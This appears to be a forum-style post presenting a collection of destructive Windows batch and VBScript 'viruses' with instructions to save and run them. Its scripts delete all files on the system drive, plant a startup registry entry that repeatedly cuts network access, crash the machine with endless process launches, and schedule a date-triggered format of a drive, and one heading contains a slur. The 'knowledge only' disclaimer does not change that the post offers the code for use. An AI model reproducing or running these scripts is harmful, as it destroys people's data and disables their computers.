Note>> I am not responsible for any damage or error reporting in Your pc do it as ur own risk. These coding only for knowledge concept.
>>This Virus Deletes All The Content Of A Drive…
Save The Above Code in a .bat file
>>Disable Internet Permanently
Save The Above Code in a .bat file
>>The Most Simple Virus To Crush The Window
Save The Above Code in a .bat file
>> This Will Crash Ur Computer
Save It As Anything.vbs
It Only Works With Windows XP
>>Endless Notepads
>> Gays Bomb Virus Joke,
****s virus i mean Bomb virus
And Save It As Anything.bat
Note:- You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action
The Virus Will Take Effect On That Day
>>This Virus Deletes All The Content Of A Drive…
Code:
@echo off[/B]
[B]del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
Save The Above Code in a .bat file
>>Disable Internet Permanently
Code:
echo @echo off>c:windowswimn32.bat[/B]
[B]echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been häçkED!
PAUSE
Save The Above Code in a .bat file
>>The Most Simple Virus To Crush The Window
Code:
@Echo off[/B]
[B]Del C:\ *.* |y
Save The Above Code in a .bat file
>> This Will Crash Ur Computer
Code:
Option Explicit[/B]
[B]
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
It Only Works With Windows XP
>>Endless Notepads
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
>> Gays Bomb Virus Joke,
****s virus i mean Bomb virus
Code:
If %date% NEQ 2009/11/25 goto exit[/B]
[B]format E: /y >nul
:exit
exit
And Save It As Anything.bat
Note:- You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action
The Virus Will Take Effect On That Day
